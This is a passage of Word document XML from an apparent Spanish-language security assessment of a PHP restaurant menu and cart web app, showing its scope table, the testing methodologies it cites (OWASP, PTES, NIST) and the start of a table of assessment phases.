          <w:p w14:paraId="3D7C0404" w14:textId="77777777" w:rsidR="002D520B" w:rsidRPr="002D520B" w:rsidRDefault="002D520B" w:rsidP="002D520B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002D520B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t>Identificador</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="1F4E78"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="59B2EFD5" w14:textId="77777777" w:rsidR="002D520B" w:rsidRPr="002D520B" w:rsidRDefault="002D520B" w:rsidP="002D520B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002D520B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t>Descripción</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D520B" w:rsidRPr="002D520B" w14:paraId="4760B497" w14:textId="77777777" w:rsidTr="002D520B">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1860" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7B5EAD4B"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Código fuente</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1860" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A2B0F2D"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pnkSecurity/pnkSecurity (aplicación web PHP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60F23824"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Aplicación web de menú digital y carrito de compras para restaurantes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D520B" w:rsidRPr="002D520B" w14:paraId="5E9537AD" w14:textId="77777777" w:rsidTr="002D520B">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1860" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63FCD3D4"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Base de datos</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1860" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75575716"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pnk_security (MySQL 8.0.17) — Script_BD/pnk_security.sql</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32B4D67D"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Modelo relacional y datos de prueba del sistema</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D520B" w:rsidRPr="002D520B" w14:paraId="6D866E28" w14:textId="77777777" w:rsidTr="002D520B">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1860" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D85BF84"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Entorno de ejecución</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1860" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F10F25C"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localhost (XAMPP/WAMP: Apache + PHP + MySQL)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="382E913C"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Entorno de desarrollo/</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>pruebas local</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1F497D"/>
              </w:rPr>
              <w:t>, sin publicación en red externa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D520B" w:rsidRPr="002D520B" w14:paraId="70749DDA" w14:textId="77777777" w:rsidTr="002D520B">
        <w:trPr>
          <w:trHeight w:val="300"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1860" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="593CD9AF"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Alcance excluido</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1860" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E77F0CF"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Infraestructura, red, sistema operativo, hosting/hardening de servidor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3100" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A5DEDB2" w14:textId="5D98015D"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Fuera del alcance de esta evaluación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44D8AC61" w14:textId="77777777" w:rsidR="00D21427" w:rsidRDefault="00D21427"/>
    <w:p w14:paraId="4759EC90" w14:textId="77777777" w:rsidR="002D520B" w:rsidRDefault="002D520B"/>
    <w:p w14:paraId="5FD53CA8" w14:textId="77777777" w:rsidR="00AE37FA" w:rsidRDefault="00AE37FA"/>
    <w:p w14:paraId="65360C0C" w14:textId="2E344E78" w:rsidR="172CEFCA" w:rsidRDefault="172CEFCA"/>
    <w:p w14:paraId="5C1E41CE" w14:textId="640EAEF4" w:rsidR="172CEFCA" w:rsidRDefault="172CEFCA"/>
    <w:p w14:paraId="1284EBE6" w14:textId="77777777" w:rsidR="002D520B" w:rsidRPr="002D520B" w:rsidRDefault="002D520B" w:rsidP="002D520B">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-CL" w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D520B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-CL" w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Metodología Aplicada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105A9B7E" w14:textId="77777777" w:rsidR="002D520B" w:rsidRDefault="002D520B" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="172CEFCA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>La evaluación fue ejecutada considerando buenas prácticas de seguridad ofensiva y metodologías reconocidas para pruebas de seguridad, tales como:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6A420B" w14:textId="7EAB2E49" w:rsidR="172CEFCA" w:rsidRDefault="172CEFCA" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BFADA78" w14:textId="18018E50" w:rsidR="2CD9EB9F" w:rsidRDefault="2CD9EB9F" w:rsidP="172CEFCA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:val="en-US" w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="172CEFCA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F497D"/>
          <w:lang w:val="en-US" w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">OWASP Web Security Testing Guide (WSTG) </w:t>
      </w:r>
      <w:r w:rsidRPr="172CEFCA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:val="en-US" w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>— Guía de referencia para la planificación y ejecución de pruebas de seguridad en aplicaciones web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C487F7" w14:textId="09CC8420" w:rsidR="2CD9EB9F" w:rsidRDefault="2CD9EB9F" w:rsidP="172CEFCA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:val="en-US" w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="172CEFCA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F497D"/>
          <w:lang w:val="en-US" w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>OWASP Application Security Verification Standard (ASVS) v5</w:t>
      </w:r>
      <w:r w:rsidRPr="172CEFCA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:val="en-US" w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Estándar utilizado como marco de referencia para la verificación de controles y requisitos de seguridad asociados al desarrollo seguro de aplicaciones. Sus categorías e indicadores permiten establecer criterios para evaluar aspectos relevantes de programación segura y controles de seguridad durante el ciclo de desarrollo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66087F21" w14:textId="54977D26" w:rsidR="2CD9EB9F" w:rsidRDefault="2CD9EB9F" w:rsidP="172CEFCA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:val="en-US" w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="172CEFCA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F497D"/>
          <w:lang w:val="en-US" w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">PTES </w:t>
      </w:r>
      <w:r w:rsidRPr="172CEFCA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:val="en-US" w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>— Penetration Testing Execution Standard — Marco de referencia para estructurar y ejecutar las diferentes fases de una prueba de penetración.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4D372A" w14:textId="31F25203" w:rsidR="2CD9EB9F" w:rsidRDefault="2CD9EB9F" w:rsidP="172CEFCA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:val="en-US" w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="172CEFCA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F497D"/>
          <w:lang w:val="en-US" w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t xml:space="preserve">NIST SP 800-115 </w:t>
      </w:r>
      <w:r w:rsidRPr="172CEFCA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:val="en-US" w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>— Technical Guide to Information Security Testing and Assessment — Guía para la planificación, ejecución y análisis de pruebas técnicas de seguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194BE79F" w14:textId="13BE7C6E" w:rsidR="2CD9EB9F" w:rsidRDefault="2CD9EB9F" w:rsidP="172CEFCA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:val="es-ES" w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="172CEFCA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:val="es-ES" w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Buenas prácticas de hardening, exposición de servicios y gestión de vulnerabilidades — Criterios complementarios utilizados para evaluar configuraciones, servicios expuestos y oportunidades de reducción de la superficie de ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2B1D49" w14:textId="57DE7D24" w:rsidR="172CEFCA" w:rsidRDefault="172CEFCA" w:rsidP="172CEFCA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:val="es-ES" w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="199B5765" w14:textId="77777777" w:rsidR="002D520B" w:rsidRDefault="002D520B" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="172CEFCA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
        <w:t>Las etapas cubiertas en este informe corresponden a:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBF89F6" w14:textId="348ECF1C" w:rsidR="172CEFCA" w:rsidRDefault="172CEFCA" w:rsidP="172CEFCA">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
          <w:lang w:eastAsia="es-CL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8075" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblCellMar>
          <w:left w:w="70" w:type="dxa"/>
          <w:right w:w="70" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2940"/>
        <w:gridCol w:w="5135"/>
      </w:tblGrid>
      <w:tr w:rsidR="002D520B" w:rsidRPr="002D520B" w14:paraId="3BDA6A0E" w14:textId="77777777" w:rsidTr="002D520B">
        <w:trPr>
          <w:trHeight w:val="315"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2940" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="1F4E78"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7774877E" w14:textId="77777777" w:rsidR="002D520B" w:rsidRPr="002D520B" w:rsidRDefault="002D520B" w:rsidP="002D520B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D520B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t>Fase</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5135" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="000000" w:fill="1F4E78"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C7EE9C1" w14:textId="77777777" w:rsidR="002D520B" w:rsidRPr="002D520B" w:rsidRDefault="002D520B" w:rsidP="002D520B">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="es-CL"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002D520B">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="es-CL"/>
              </w:rPr>
              <w:t>Descripción</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D520B" w:rsidRPr="002D520B" w14:paraId="14882FEF" w14:textId="77777777" w:rsidTr="002D520B">
        <w:trPr>
          <w:trHeight w:val="900"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2940" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="452365DD"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lastRenderedPageBreak/>
              <w:t>Revisión de arquitectura</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5135" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A07B3C3"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Análisis de la estructura del proyecto, flujo de datos y componentes (frontend, backend y base de datos)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002D520B" w:rsidRPr="002D520B" w14:paraId="36D8B839" w14:textId="77777777" w:rsidTr="002D520B">
        <w:trPr>
          <w:trHeight w:val="900"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2940" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47A3B379"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Análisis estático de código fuente (SAST manual)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5135" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
